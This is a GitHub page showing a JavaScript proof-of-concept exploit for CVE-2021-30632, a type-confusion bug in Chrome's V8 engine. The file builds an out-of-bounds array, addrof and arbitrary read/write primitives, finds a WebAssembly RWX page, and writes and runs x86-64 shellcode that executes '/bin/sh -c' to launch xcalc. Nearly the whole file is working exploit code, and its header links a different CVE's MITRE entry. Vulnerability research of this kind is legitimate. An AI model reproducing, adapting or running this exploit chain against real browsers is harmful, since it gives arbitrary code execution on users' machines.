-
Notifications
You must be signed in to change notification settings - Fork 20
/
Copy pathcve-2021-30632.js
121 lines (94 loc) · 2.82 KB
/
cve-2021-30632.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
/*
CVE-2021-30632
HEAD @ 632e6e71c5ff752f8c448061ab32ae2d9b1825ec
https://bugs.chromium.org/p/chromium/issues/detail?id=1247763
https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2021-21220
*/
var bs = new ArrayBuffer(8);
var fs = new Float64Array(bs);
var is = new BigUint64Array(bs);
function ftoi(val) {
fs[0] = val;
return is[0];
}
function itof(val) {
is[0] = val;
return fs[0];
}
function foo(x) {
_x = x;
}
function bar() {
_x[19] = 133.7;
}
function baz() {
var arr = new Array(30); arr.fill(1); arr.x = 1;
var oob = new Array(20); oob.fill(1.1);
for (let i = 0; i < 40000; i++) {
if (i == 20000)
_c[0] = 1.1;
foo(_b);
}
_x[0] = 1.1;
for (let i = 0; i < 100000; i++)
bar();
foo(arr);
bar();
return oob;
}
var _a = new Array(1); _a.fill(1); _a.x = 1;
var _b = new Array(1); _b.fill(1); _b.x = 1;
var _c = new Array(1); _c.fill(1); _c.x = 1;
var _x = _a;
oob = baz();
/* flt.elements @ oob[86] */
/* obj.elements @ oob[95] */
let flt = [1.1];
let tmp = {a: 1};
let obj = [tmp];
console.log(oob.length);
function addrof(o) {
let a = ftoi(oob[95]) & 0xffffffffn;
let b = ftoi(oob[86]) >> 32n;
oob[86] = itof((b << 32n) + a);
obj[0] = o;
return (ftoi(flt[0]) & 0xffffffffn) - 1n;
}
function read(p) {
let a = ftoi(oob[86]) >> 32n;
oob[86] = itof((a << 32n) + p - 8n + 1n);
return ftoi(flt[0]);
}
function write(p, x) {
let a = ftoi(oob[86]) >> 32n;
oob[86] = itof((a << 32n) + p - 8n + 1n);
flt[0] = itof(x);
}
let wasm = new Uint8Array([
0x00, 0x61, 0x73, 0x6d, 0x01, 0x00, 0x00, 0x00, 0x01, 0x85, 0x80, 0x80, 0x80,
0x00, 0x01, 0x60, 0x00, 0x01, 0x7f, 0x03, 0x82, 0x80, 0x80, 0x80, 0x00, 0x01,
0x00, 0x04, 0x84, 0x80, 0x80, 0x80, 0x00, 0x01, 0x70, 0x00, 0x00, 0x05, 0x83,
0x80, 0x80, 0x80, 0x00, 0x01, 0x00, 0x01, 0x06, 0x81, 0x80, 0x80, 0x80, 0x00,
0x00, 0x07, 0x91, 0x80, 0x80, 0x80, 0x00, 0x02, 0x06, 0x6d, 0x65, 0x6d, 0x6f,
0x72, 0x79, 0x02, 0x00, 0x04, 0x6d, 0x61, 0x69, 0x6e, 0x00, 0x00, 0x0a, 0x8a,
0x80, 0x80, 0x80, 0x00, 0x01, 0x84, 0x80, 0x80, 0x80, 0x00, 0x00, 0x41, 0x2a,
0x0b
]);
let module = new WebAssembly.Module(wasm);
let instance = new WebAssembly.Instance(module);
let entry = instance.exports.main;
let rwx = read(addrof(instance) + 0x68n);
/* DISPLAY=':0.0' xcalc */
let shellcode = new Uint8Array([
0x48, 0xb8, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x99, 0x50, 0x54,
0x5f, 0x52, 0x66, 0x68, 0x2d, 0x63, 0x54, 0x5e, 0x52, 0xe8, 0x15, 0x00, 0x00,
0x00, 0x44, 0x49, 0x53, 0x50, 0x4c, 0x41, 0x59, 0x3d, 0x27, 0x3a, 0x30, 0x2e,
0x30, 0x27, 0x20, 0x78, 0x63, 0x61, 0x6c, 0x63, 0x00, 0x56, 0x57, 0x54, 0x5e,
0x6a, 0x3b, 0x58, 0x0f, 0x05
]);
let buf = new ArrayBuffer(shellcode.length);
let view = new DataView(buf);
write(addrof(buf) + 0x1cn, rwx);
for (let i = 0; i < shellcode.length; i++)
view.setUint8(i, shellcode[i]);
entry();